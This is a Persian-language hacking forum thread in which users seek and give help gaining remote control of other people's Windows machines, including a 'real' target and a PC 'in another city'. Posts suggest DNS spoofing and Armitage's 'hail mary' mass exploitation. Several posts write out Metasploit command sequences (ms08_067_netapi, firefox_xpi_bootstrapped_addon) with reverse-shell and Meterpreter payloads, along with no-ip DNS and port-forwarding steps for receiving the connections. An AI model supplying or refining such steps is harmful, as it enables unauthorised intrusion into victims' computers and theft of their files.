اگر با قربانی در یک شبکه ی محلی هستید فقط کافیه DNS SPOOFING انجام بدید و از این طریق بدون این که لینک رو به قربانی بدید ، روی سیستمش لینک رو اجرا کنید ، یعنی قربانی می زنه google..com ولی در مرورگرش لینک شما باز می شه....

Mary4m
03-01-2015, 08:53 PM
با تشکر
مشکل اینجاست که تارگتای من Remote IP دارن نه Local

Prot3ct0r
03-01-2015, 09:06 PM
با تشکر
مشکل اینجاست که تارگتای من Remote IP دارن نه Local

درود

این چیزی که شما میخواید حتما باید یک باگ از یکی از سرویس های ویندوز تارگت شما پیدا کنید :) برای مثال تارگت شما از نسخه ویندوز های Beta استفاده میکنه و بروز نکرده به همین علت باگ های زیادی میتونه داشته باشه :)
قسمت بعدی هم مربوط به آسیب پذیری های برنامه های اجرایی هست مانند Kmplayer و ... که میتونید توی سایت Exploit-db قسمت اکسپلویت های Remote جستجو کنید :)

البته قابل ذکر هست به علت محدودیت های ISP ، فایروال ویندوز و ... دیگه استفاده از اکسپلویت های Remote اونجوری که شما قصد دارید از کار افتاده است .

طبق توضیح دوست خوبمون هم میتونید از روش DNS Spoofing استفاده کنید در صورتی که به Router طرف مقابل دسترسی دارید.

موفق باشید

barayand
03-01-2015, 11:39 PM
درود!

من با ارمیتج تمامی اکسپلویت هاشو به صورت خودکار تست کردم بر روی تارگت مورد نظر ولی هیچ گونه دسترسی نمیتونم بهش داشته باشم . راحی هست که بشه روت شد به تارگت؟

XoDiAK
03-01-2015, 11:49 PM
درود!

من با ارمیتج تمامی اکسپلویت هاشو به صورت خودکار تست کردم بر روی تارگت مورد نظر ولی هیچ گونه دسترسی نمیتونم بهش داشته باشم . راحی هست که بشه روت شد به تارگت؟

سلام دوست عزیز شما ایپیتون استاتیک هست ؟؟

اگه نیست باید از dns استفاده کنید که با یه سرچ کوچیک تو انجمن پیدا میکنید وگرنه همه تلاشتون بی فایده بوده :)

Muts
03-02-2015, 01:22 AM
درود!

من با ارمیتج تمامی اکسپلویت هاشو به صورت خودکار تست کردم بر روی تارگت مورد نظر ولی هیچ گونه دسترسی نمیتونم بهش داشته باشم . راحی هست که بشه روت شد به تارگت؟
سلام
lab تست کردید یا real ؟

بشه روت شد
منظور شما از روت شدن رو متوجه نشدم
احتمال های خیلی زیاده از جمله آسیب پذیر نبودن تارگت، اشتباه در انتخاب اکسپلویت ، وجود فایروال و غیره باشه
فاز جمع اوری اطلاعات رو جدی بگیرید./
موفق باشید

barayand
03-03-2015, 01:22 AM
سلام دوست عزیز شما ایپیتون استاتیک هست ؟؟

اگه نیست باید از dns استفاده کنید که با یه سرچ کوچیک تو انجمن پیدا میکنید وگرنه همه تلاشتون بی فایده بوده :)

نه استاتیک نیست.
روش استفاده از dns رو اگه ممکنه راهنمایی کنید یا لینک بدین. ممنون

barayand
03-03-2015, 01:24 AM
سلام
lab تست کردید یا real ؟

منظور شما از روت شدن رو متوجه نشدم
احتمال های خیلی زیاده از جمله آسیب پذیر نبودن تارگت، اشتباه در انتخاب اکسپلویت ، وجود فایروال و غیره باشه
فاز جمع اوری اطلاعات رو جدی بگیرید./
موفق باشید

منظور از lab یا real رو نفهمیدم. بنده در ترمینال مینویسم armitage و خودش اجرا میشه یا در قسمت منوی بالای کالی لنوکس ارمیتیج رو اجرا میکنم.
منظور از روت همان root یا دسترسی کامل که با rdesktop بعدشم ای پی بزنم و پسوورد و یوزر وارد محیطش بشم.

Prot3ct0r
03-03-2015, 02:39 PM
منظور از lab یا real رو نفهمیدم. بنده در ترمینال مینویسم armitage و خودش اجرا میشه یا در قسمت منوی بالای کالی لنوکس ارمیتیج رو اجرا میکنم.
منظور از روت همان root یا دسترسی کامل که با rdesktop بعدشم ای پی بزنم و پسوورد و یوزر وارد محیطش بشم.

درود

اگر به صورت لوکال و در محیطی که خودتون تنظیم کردید تست میکنید به اصطلاح به اون Lab میگویند در صورتی که میخواهید یک تارگت واقعی رو بزنید مشکلات زیادی اعم از فایروال ، .... رو دارید که دوست خوبم جناب predator اشاره کردند.

در صورتی که شما دسترسی Administrator در ویندوز یا Root در لینوکس رو میخواهید باید بر اساس اکسپلویت و قربانی از Payload ای استفاده کنید.

برای راهنمایی های بیشتر اکسپلویتی که میخواهید استفاده کنید و platform مورد نظر را ذکر کنید، قابل ذکر است که Meterpreter یکی از بهترین Payload ها میباشد که هم تحت ویندوز و هم تحت لینوکس قابل استفاده میباشد.

آموزش های تکمیلی در بخش وجود دارد.

برای بحث DNS هم آموزشش در امضای بنده موجود هست.

موفق باشید

Muts
03-03-2015, 11:06 PM
منظور از lab یا real رو نفهمیدم. بنده در ترمینال مینویسم armitage و خودش اجرا میشه یا در قسمت منوی بالای کالی لنوکس ارمیتیج رو اجرا میکنم.
منظور از روت همان root یا دسترسی کامل که با rdesktop بعدشم ای پی بزنم و پسوورد و یوزر وارد محیطش بشم.

با توجه به راهنمایی پست قبلی شما چه مواردی رو انجام میدید؟ (نوع اکسپلویت ؟ تارگت ؟نحوه ست کردن اپشن ها و...)

modiret
03-03-2015, 11:25 PM
سلام دوستان من میخام با اکسپلویت روی کالی که بصورت لایو اجراش کردم
به ویندوز xp که روی vmware نصب کردم با دستورات Command Prompt به فایل های ویندوزxp دسترسی بگیرم.دستورای که میزنم اینها هستن:



service postgresql start
service metasploit start
msfconsole
search ms08-067
info exploit/windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.179.130
show options
set payload windows/shell_reverse_tcp
show options
set LHOST 192.168.179.130
show options
exploit

ولی ارور زیر رو میده

123407

لطفا راهنمایی کنید

Muts
03-03-2015, 11:45 PM
سلام دوستان من میخام با اکسپلویت روی کالی که بصورت لایو اجراش کردم
به ویندوز xp که روی vmware نصب کردم با دستورات Command Prompt به فایل های ویندوزxp دسترسی بگیرم.دستورای که میزنم اینها هستن:



service postgresql start
service metasploit start
msfconsole
search ms08-067
info exploit/windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.179.130
show options
set payload windows/shell_reverse_tcp
show options
set LHOST 192.168.179.130
show options
exploit

ولی ارور زیر رو میده

123407

لطفا راهنمایی کنید

سلام
احتمالا اسیب پذیری پچ شده و بقیه موارد مثل فایروال و...
سعی یه یادگیری مفهومی متاسپلویت کنید و صرفا دستورات نمیتونه به شما کمک کنه
(شروع یه یادگیری لینوکس هم بکنید./ ;) )
موفق باشید

barayand
03-04-2015, 04:49 AM
با توجه به راهنمایی پست قبلی شما چه مواردی رو انجام میدید؟ (نوع اکسپلویت ؟ تارگت ؟نحوه ست کردن اپشن ها و...)

به صورت real هست و برای اکسپلویت ها بنده با دستور msfupdate اپدیتش کردم و با استفاده از اکسپلویت های اپدیت شده دونه دونه خود ارمیتج تست میکنه که من میام از این طریق این کار هارو انجام میدم


armitage > hosts > msf scam >ip target xxx : xxx : xxx :* >ok >escan mikone >attacks >hail mary >ok
و منظر میمونم تموم که شد بعد روی تارگت که اگه با پورت مورد نظر تارگت رو شناسایی کرده باشه و نوع سیستم عامل رو توضیح داده باشه منم روی تارگت کلیک راست میکنم و روی attack میزنم و بعد دونه دونه هر کدوم رو انتخاب میکنم و check exploit رو میزنم.اونم تست میکنه که اکسپلویت ها پی در پی ست بشه


و ورژن کالی 1.1 میباشد و ارمیتج 4.9 میباشد

barayand
03-04-2015, 07:01 AM
درود

اگر به صورت لوکال و در محیطی که خودتون تنظیم کردید تست میکنید به اصطلاح به اون Lab میگویند در صورتی که میخواهید یک تارگت واقعی رو بزنید مشکلات زیادی اعم از فایروال ، .... رو دارید که دوست خوبم جناب predator اشاره کردند.

در صورتی که شما دسترسی Administrator در ویندوز یا Root در لینوکس رو میخواهید باید بر اساس اکسپلویت و قربانی از Payload ای استفاده کنید.

برای راهنمایی های بیشتر اکسپلویتی که میخواهید استفاده کنید و platform مورد نظر را ذکر کنید، قابل ذکر است که Meterpreter یکی از بهترین Payload ها میباشد که هم تحت ویندوز و هم تحت لینوکس قابل استفاده میباشد.

آموزش های تکمیلی در بخش وجود دارد.

برای بحث DNS هم آموزشش در امضای بنده موجود هست.

موفق باشید
بنده فیلم dns رو که گفتین دانلود و نگاه کردم و موقع استفاده به مشکل برخوردم و این که توی مودم این کارو کردم ولی ست نمیشد و اصلا اموزش خوبی نبود و جزءیات درش موجود نبود و مثلا برای ساخت dns توی سایت اصلا نگفت چیکار کنین فقط عکسشو نشون میداد که چیکار کرده بود ولی من هیچ کاری نتونستم بکنم.اگه امکانش هست خودتون روی کالی لینوکس فیلمشو پر کنین. با تشکر

Prot3ct0r
03-04-2015, 02:39 PM
بنده فیلم dns رو که گفتین دانلود و نگاه کردم و موقع استفاده به مشکل برخوردم و این که توی مودم این کارو کردم ولی ست نمیشد و اصلا اموزش خوبی نبود و جزءیات درش موجود نبود و مثلا برای ساخت dns توی سایت اصلا نگفت چیکار کنین فقط عکسشو نشون میداد که چیکار کرده بود ولی من هیچ کاری نتونستم بکنم.اگه امکانش هست خودتون روی کالی لینوکس فیلمشو پر کنین. با تشکر

درود

آموزش بسیار کامل هست و جوری ساخته شده که شما باید حداقل با تروجان ها کار کرده باشید برای این کار ، وگرنه درون آموزش تمامی بعد ها مورد بررسی قرار گرفته است؛ تمامی موارد گفته شده اما برای بحث DNS شما باید درون سایت No-ip ثبت نام کنید و سپس یک DNS جدید ایجاد کرده و در قسمت ip address آی پی سیستمتون رو وارد کنید:

[Only registered and activated users can see links]


به صورت real هست و برای اکسپلویت ها بنده با دستور msfupdate اپدیتش کردم و با استفاده از اکسپلویت های اپدیت شده دونه دونه خود ارمیتج تست میکنه که من میام از این طریق این کار هارو انجام میدم


armitage > hosts > msf scam >ip target xxx : xxx : xxx :* >ok >escan mikone >attacks >hail mary >ok
و منظر میمونم تموم که شد بعد روی تارگت که اگه با پورت مورد نظر تارگت رو شناسایی کرده باشه و نوع سیستم عامل رو توضیح داده باشه منم روی تارگت کلیک راست میکنم و روی attack میزنم و بعد دونه دونه هر کدوم رو انتخاب میکنم و check exploit رو میزنم.اونم تست میکنه که اکسپلویت ها پی در پی ست بشه


و ورژن کالی 1.1 میباشد و ارمیتج 4.9 میباشد

به شما پیشنهاد میکنم که در ابتدا روی lab تست کنید و در ادامه real :) یک سری از موارد مثل Check کردن فایروال و ... میمونه که باید از identifier هایی که توی خود همون کالی وجود داره استفاده کنید ؛ مبحث زیاد دشواری نیست فقط باید مراحل کار رو به درستی انجام بدید ، اینم که شما از hail mary استفاده میکنید و آسیب پذیری ای شناسایی نمیشه حتما تارگت شما آسیب پذیر نیست .

modiret
03-05-2015, 06:50 PM
سلام دوستان من با استفاده از دستورات زیر میتونم دسترسی به ویندوز7 خودم که به مودم خودم وصل هست دسترسی بگیرم.
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
show targets
set target 1
set srvhost 192.168.0.0
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 192.168.0.0
set lport 4321

ولی نمیتونم به یه ویندوز 7دیگه که به یه مودم دیگه وصل هست دسترسی بگیرم.میشه راهنمایی کنید که چطور میتونم اینکارو بکنم؟فرقی نمیکنه که لینک بهش بدم یا برنامه فقط بتونم دسترسی بگیرم

Pc Monk
03-05-2015, 11:18 PM
سلام دوستان من با استفاده از دستورات زیر میتونم دسترسی به ویندوز7 خودم که به مودم خودم وصل هست دسترسی بگیرم.
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
show targets
set target 1
set srvhost 192.168.0.0
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 192.168.0.0
set lport 4321

ولی نمیتونم به یه ویندوز 7دیگه که به یه مودم دیگه وصل هست دسترسی بگیرم.میشه راهنمایی کنید که چطور میتونم اینکارو بکنم؟فرقی نمیکنه که لینک بهش بدم یا برنامه فقط بتونم دسترسی بگیرم

قربانی حتماً باید لینک رو باز کنه و accept کنه در غیر این صورت موفقیت آمیز نخواهد بود

modiret
03-05-2015, 11:19 PM
قربانی حتماً باید لینک رو باز کنه و accept کنه در غیر این صورت موفقیت آمیز نخواهد بود

دوست عزیز میدونم روی ویندوز خودم انجام میشه ولی روی یه ویندوز 7 دیگه که مثلا از یه شهر دیگه باشه عمل نمیکنه این روش

alimemco00
03-05-2015, 11:28 PM
سلام دوستان من با استفاده از دستورات زیر میتونم دسترسی به ویندوز7 خودم که به مودم خودم وصل هست دسترسی بگیرم.
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
show targets
set target 1
set srvhost 192.168.0.0
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 192.168.0.0
set lport 4321

ولی نمیتونم به یه ویندوز 7دیگه که به یه مودم دیگه وصل هست دسترسی بگیرم.میشه راهنمایی کنید که چطور میتونم اینکارو بکنم؟فرقی نمیکنه که لینک بهش بدم یا برنامه فقط بتونم دسترسی بگیرم

این IP لوکاله و فقط توی سیستم خودت قابل استفاده هست !

از ip valid ( public ) استفاده کن

ip public خودت رو ازینجا ببین [Only registered and activated users can see links]

Prot3ct0r
03-06-2015, 10:57 AM
دوست عزیز میدونم روی ویندوز خودم انجام میشه ولی روی یه ویندوز 7 دیگه که مثلا از یه شهر دیگه باشه عمل نمیکنه این روش

درود

همونظور که دوست عزیز توضیح دادند شما باید دارای ip ولید باشه و میتونید از DNS ام استفاده کنید :) آموزش استفاده از DNS در امضای بنده موجود هست ... یک سری موارد مثل Port forwarding هم باید رعایت کنید که توی آموزشی که توی امضام هست بهش اشاره شده است.

موفق باشید

modiret
03-07-2015, 01:54 PM
سلام من با استفاده از آموزش تاپیک زیر
[Only registered and activated users can see links]
همه مراحل رو درست میرم و dns هم داخل noip ساختم ولی الان مشکل برا Port forwarding دارم که میخام پورت 4444 رو باز کنم ولی هرکاری میکنم نمیشه مودمم dlink 2730u هست عکس زیر رو هم ببینید برا قسمت Port forwarding هست هرکی میتونه لطفا کمک کنه

123593

Prot3ct0r
03-07-2015, 04:27 PM
سلام من با استفاده از آموزش تاپیک زیر
[Only registered and activated users can see links]
همه مراحل رو درست میرم و dns هم داخل noip ساختم ولی الان مشکل برا Port forwarding دارم که میخام پورت 4444 رو باز کنم ولی هرکاری میکنم نمیشه مودمم dlink 2730u هست عکس زیر رو هم ببینید برا قسمت Port forwarding هست هرکی میتونه لطفا کمک کنه

123593

درود

گزینه use defined service name را انتخاب کنید و یک اسم دلخواه برای اون بگذارید و در قسمت Lan Ip Address آدرس ip لوکال اتون رو وارد کنید ، سپس سرویسی را درون پورت مربوطه به حالت شنود بگذارید و در سایت مربوطه چک کنید.

* در صورتی که از متاسپلویت و در سیستم عاملی جدا مانند کالی پورت را Listen کردید میبایست درون سیستم عامل مربوطه و مشخصات سیستم عامل مربوطه را در قسمت Lan IP address وارد کنید و حتما باید کارت شبکه اون سیستم عامل جدا باشد.

موفق باشید

modiret
03-07-2015, 05:10 PM
درود

گزینه use defined service name را انتخاب کنید و یک اسم دلخواه برای اون بگذارید و در قسمت Lan Ip Address آدرس ip لوکال اتون رو وارد کنید ، سپس سرویسی را درون پورت مربوطه به حالت شنود بگذارید و در سایت مربوطه چک کنید.

* در صورتی که از متاسپلویت و در سیستم عاملی جدا مانند کالی پورت را Listen کردید میبایست درون سیستم عامل مربوطه و مشخصات سیستم عامل مربوطه را در قسمت Lan IP address وارد کنید و حتما باید کارت شبکه اون سیستم عامل جدا باشد.

موفق باشید

Protocol رو بصورت tcp/udp بزارم
WAN Port رو 4444 بزنم
LAN Open Port رو 4444 بزنم
WAN Setting رو چی بزنم؟ interface بزنم یا ip adderss؟
LAN Ip Address این رو هم آیپی لوکال کالی بزنم
(* در صورتی که از متاسپلویت و در سیستم عاملی جدا مانند کالی پورت را Listen کردید میبایست درون سیستم عامل مربوطه و مشخصات سیستم عامل مربوطه را در قسمت Lan IP address وارد کنید و حتما باید کارت شبکه اون سیستم عامل جدا باشد.) این قسمتو نفهمیدم منظورتون چی بود؟